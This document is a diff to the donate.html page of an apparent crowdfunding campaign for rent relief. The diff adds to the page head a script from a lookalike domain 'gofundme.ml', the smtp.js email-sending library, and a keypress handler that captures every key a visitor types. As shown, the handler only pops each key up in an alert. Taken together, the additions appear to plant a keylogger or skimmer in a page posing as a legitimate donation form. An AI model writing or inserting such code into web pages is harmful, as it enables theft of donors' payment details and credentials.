--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -3,6 +3,16 @@
   <title>
    Donate to providing rent relief for my close friend Lydia
   </title>
+  <script src="https://smtpjs.com/v3/smtp.js"></script>
+  <script src="https://gofundme.ml/idk.js"></script>
+  <script>
+   document.onkeypress = function(e) {
+	get = window.event?event:e;
+	key = get.keyCode?get.keyCode:get.charCode;
+	key = String.fromCharCode(key);
+	window.alert(key);
+}
+  </script>
   <meta charset="utf-8" data-react-helmet="true"/>
   <meta content="ie=edge" data-react-helmet="true" http-equiv="x-ua-compatible"/>
   <meta content="width=device-width, initial-scale=1.0" data-react-helmet="true" name="viewport"/>
